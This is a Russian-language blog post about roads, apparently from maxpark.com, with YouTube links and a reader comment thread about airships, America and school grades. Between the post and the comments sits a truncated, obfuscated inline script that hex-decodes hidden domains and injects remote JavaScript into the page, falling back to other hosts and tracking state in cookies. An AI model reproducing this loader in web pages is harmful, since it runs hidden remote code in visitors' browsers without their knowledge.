Эх, дороги !...
Я хочу , чтобы так было и у нас :
как В США :
https://youtu.be/GbIbDyxhcP0
как В Германии :
https://youtu.be/_0T6HXNRpT8
так в Белоруссии :
https://youtu.be/mIk0Z0_MFRo
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии
Понять не могу почему от него отказались?
Можно ведь при современном уровне науки как-то избежать тех аварий , которые поставили крест на дирежаблестроении. Хотя бы рейсы через океан - насколько они дешевле бы обходились человечеству !
Как рвет их в той же поганой Америке на Аляске. к примеру.
А я думала , что в Америке что-то придумали , чтобы противостоять таким перепадам температур...
А помните эту книгу ? Когда-то прочла её за один вечер- ночь! Зауважала Америку тогда.
И , с другой стороны просто ужаснулась , прочитав там про образование в США...
Но прошло время и сейчас уже новые технологии...
Хотя... Я думаю, и сейчас она была бы любопытна. Особенно в той части , где говорят об образовании. Кстати , наши неразворотливые лопухи , получив такое описание американских технологий ни разу не почесались слизать хоть что-то у них. Зато телепрограммы сейчас только у них и слизывают, а вот промышленные технологии считают ниже своего достоинства копировать...
Ну, вспомните, хотя бы школу.Что дало вам(если вы списывали дом. задания у подруг) такое списывание?Вы что-то узнали?
Вы не имеете важной части общечеловеческого опыта.
В Союзе я была бы на коне - там уважали знания и способности и давали таким красный свет. А в капитализме надо зубами и локтями пробивать дорогу , поэтому большинство отличников сидят в жо.е , как и я.
Ну, не умеем мы бороться за место под солнцем и стесняемся...
Отличники очень редко оказываются на коне.Очень редко.В СССР так же было.
А вот троечники на нем гарцуют постоянно.
причем, очень часто, с большой пользой для общества.
Троечник может иметь неплохой педагогический талант - да! Но ,как учитель будет никаким - кругозор троечника узок и ему несвойственна пытливость. И талантливые ученики будут решать задачи лучше его. Как только ученики это заметят - он лишится авторитета.
А вот директором , хозяйственником, троечник может быть толковым : талант организатора не оценивает школа. К тому же троечники , как правило , всегда стремятся во власть - они не увлечены наукой .
Троечник. чаще всего , человек имеющий все что имеет отличник, кроме желания.
А вот когда появляется желание, тогда и проявляются эти качества.и как раз именно троечнику свойственна пытливость, правда в большом, неохватном количестве областей.
Я знаю многих отличников снизивших свой статус работников. причем добровольно.
И напротив. знаю троечников, этот статус повышающих.
Впрочем, конечно, знания, если ими человек может пользоваться во вред не идут.
Единственно с чем могу согласиться с Вами, в том , что , возможно , у троечников могут быть другие способности , которые не оценивает школа : предпринимательские, организаторские, педагогические, какие-то узкопрофессиональные, хитрость, умение манипулировать людьми, умение плести интриги ( это тоже дар от Бога), знание людей, умение постоять за себя, желание сделать карьеру...
Вот эти качества многих из них и выводит их в лидеры.
Это выводит их в лидеры
Проявляется, только вы смотрите через призму собственной пытливости.
А у меня в школе, например, погибли два пацана, один был моим другом, а второй братом одноклассника.
Один залез в мотобот( у нас была как бы стоянка частных плавсредств, но при СССР ни о какой охране речи не было) и там его то ли убили , то ли он задохнулся парами бензина(точнее не знаю, отсутствовал в городе, а так бы вместе с ним полез), а второго убило током, в трансформаторной будке.
Оба были троечниками.
Как вы думаете зачем они туда полезли?
Плохо слушали рассказы учителя на уроке об электричестве.
Любопытство и пытливость - это не совсем одно и то же . Пытливость - это одержимость знаниями.
Также как героизм, храбрость и бравада прокатиться на крыше электрички - это совершенно разные вещи.
А пытливость и любознательность, это как раз собирание шишек в течении жизни.и некоторые из этих шишек могут быть смертельны.
"Опыт-сын ошибок трудных"